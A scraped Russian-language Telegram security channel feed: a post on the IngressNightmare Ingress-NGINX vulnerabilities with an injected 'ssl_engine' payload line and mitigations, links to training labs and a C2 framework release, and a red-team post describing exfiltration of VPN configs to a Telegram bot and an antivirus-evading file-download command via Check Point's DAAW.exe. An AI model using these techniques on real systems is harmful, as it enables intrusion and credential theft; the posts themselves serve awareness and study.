Forwarded from Blue (h/c)at Café
Всем привет, и да, я снова тут с постом, который никто особо не ждал, ведь выше есть пост, но пройти мимо такой темы я не смог. Сегодня расскажу более подробно про свежий и крайне неприятный инцидент в Kubernetes-мире.
Короче, ребята из Wiz недавно нашли серию критических уязвимостей в контроллере Ingress-NGINX для Kubernetes. Назвали это всё красиво и драматично – IngressNightmare. И поверьте, название выбрали неспроста: если коротко, то это пять CVE, из-за которых атакующий может спокойно выполнить код на ingress-контроллере и буквально угнать весь кластер со всеми секретами. И самое весёлое, что атакующему даже не нужны учётные записи или пароли, хватит одного кривого HTTP-запроса.
Суть этих уязвимостей кроется в недостаточной проверке входящих данных, которые разработчики Ingress-NGINX радостно вставляли напрямую в конфиги NGINX. Из-за этого через безобидные, казалось бы, аннотации (auth-url, auth-tls-match-cn, mirror-target) можно было внедрить произвольные директивы. Ну, например, какую-нибудь такую прелесть:
ssl_engine /tmp/malicious.so;
Именно это использовали исследователи Wiz в своём PoC. Ты просто отправляешь HTTP-запрос с большим телом, NGINX сохраняет это тело как временный файл, а потом через специальный AdmissionReview-запрос (без аутентификации!) загружает твою вредоносную .so библиотеку. И всё, поздравляю, теперь ты внутри контейнера с контроллером. Дальше читаешь секреты, токены и вообще делаешь, что хочешь.
Если ваша версия Ingress-NGINX ниже v1.12.1 (а ещё 1.11.5 и 1.10.7), то у вас серьёзные проблемы:
kubectl -n ingress-nginx get deploy ingress-nginx-controller -o=jsonpath='{.spec.template.spec.containers[0].image}'
image: ingress-nginx/controller:v1.12.0
Что делать, если вы попали в этот клуб неудачников с уязвимой версией:
1. Срочно обновляйтесь до v1.12.1;
2. Пока не обновились, отключите admission-контроллер (controller.admissionWebhooks.enabled=false);
3. Ограничьте доступ к admission webhook с помощью Network Policy. Только API-сервер должен туда стучаться;
4. Просмотрите audit-логи Kubernetes и ищите подозрительные Ingress’ы с странными аннотациями.
Если вы не можете обновиться сразу (а кто из нас может?), хотя бы проверьте, что webhook не светит в интернет. В Wiz уже подсчитали, что около 6500 кластеров с открытым admission webhook доступны снаружи.
Вот казалось бы, мелочь – не проверить пару строк кода, не закрыть пару портов, но в итоге получаешь катастрофу, достойную отдельного поста в моём канале. В очередной раз понимаешь, насколько всё хрупко и насколько важна роль команд AppSec и DevSecOps в крупных компаниях. В общем, проверьте свои кластеры, обновитесь и берегите нервы, они вам ещё пригодятся.
Спасибо, что дочитали мой очередной маленький монолог. Обещаю, скоро вернусь с чем-нибудь менее трагичным.
#devsecops #appsec
Please open Telegram to view this post
VIEW IN TELEGRAM
WebSploit Labs - это учебная среда, созданная Омаром Сантосом для проведения различных тренингов по кибербезопасности, этическому взлому, поиску ошибок, реагированию на инциденты, цифровой криминалистике и поиску угроз. WebSploit Labs включает в себя несколько намеренно уязвимых приложений, работающих в контейнерах Docker поверх Kali Linux или Parrot Security OS, несколько дополнительных инструментов и более 9000 ресурсов для обеспечения кибербезопасности.
WebSploit Labs используется многими колледжами и университетами в разных странах. В нем содержится более 500 различных упражнений!
🔗Ссылка:
https://websploit.org/
WebSploit Labs используется многими колледжами и университетами в разных странах. В нем содержится более 500 различных упражнений!
🔗Ссылка:
https://websploit.org/
websploit.org
WebSploit Labs by Omar Santos - WebSploit Labs
WebSploit Labs is a learning environment created by [Omar Santos](https://www.linkedin.com/in/santosomar/) for different Cybersecurity Ethical Hacking, Bug Hunting, Incident Response, Digital Forensics, and Threat Hunting training sessions. WebSploit Labs…
Forwarded from Proxy Bar
Forwarded from Поросёнок Пётр
Малварь рисёрчеры и реверсеры видимо тоже скоро следом за веберами пойдут на курсы пекарей, электриков и плотников? 🤨
LaurieWired скрестила Ghidra с LLM. Получилось очень хорошо.
Ссылка на проект тут.
LaurieWired скрестила Ghidra с LLM. Получилось очень хорошо.
Ссылка на проект тут.
YouTube
ghidraMCP: Now AI Can Reverse Malware
Just built an MCP for Ghidra.
Now basically any LLM (Claude, Gemini, local...) can Reverse Engineer malware for you. With the right prompting, it automates a *ton* of tedious tasks.
One-shot markups of entire binaries with just a click.
Open source, on…
Now basically any LLM (Claude, Gemini, local...) can Reverse Engineer malware for you. With the right prompting, it automates a *ton* of tedious tasks.
One-shot markups of entire binaries with just a click.
Open source, on…
👍1
Forwarded from Adaptix Framework
AdaptixC2 v0.3 is out
https://github.com/Adaptix-Framework/AdaptixC2
New:
* Linking Agents (eg SMB)
* Sessions Graph
* Agent marker
* Health checker
* And more in the changelog
https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.2-greater-than-v0.3
https://github.com/Adaptix-Framework/AdaptixC2
New:
* Linking Agents (eg SMB)
* Sessions Graph
* Agent marker
* Health checker
* And more in the changelog
https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.2-greater-than-v0.3
Репост/перепост приветствуется😉
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
❤2
Forwarded from s0ld13r ch. (s0ld13r)
Кто любит VPN?! 😆
Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN🤔
Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV🔫
Нашел пару use кейсов на примере клиента CheckPoint VPN:
В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь🤣
В качестве PoC написал инструмент для поиска конфигов на хосте😠
Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)
❗️ File Drop via Check Point VPN binaries:
Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.
P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем
@s0ld13r_ch
Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN
Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV
Нашел пару use кейсов на примере клиента CheckPoint VPN:
В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь
В качестве PoC написал инструмент для поиска конфигов на хосте
Chocopie is a tool designed for reconnaissance on a host system, specifically to check for the presence of VPN configuration files. It scans the system drive (`C:\Users\`) for OpenVPN configuration files (`.ovpn`) and extracts VPN-related configurations from CheckPoint Endpoint Connect logs. The found data is then automatically sent to a Telegram bot.
Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)
C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe -url <URL> -fileName <PATH>
Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.
P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Утечка пользовательской базы списка рассылки автора сервиса HaveIBeenPwned
Трой Хант (Troy Hunt), известный деятель в области компьютерной безопасности, автор курсов по защите информации, создатель сервиса проверки скомпрометированных паролей "Have I Been Pwned?" и региональный директор Microsoft, раскрыл сведения об утечке базы…
🔗Ссылка:
https://opennet.ru/62964/
https://opennet.ru/62964/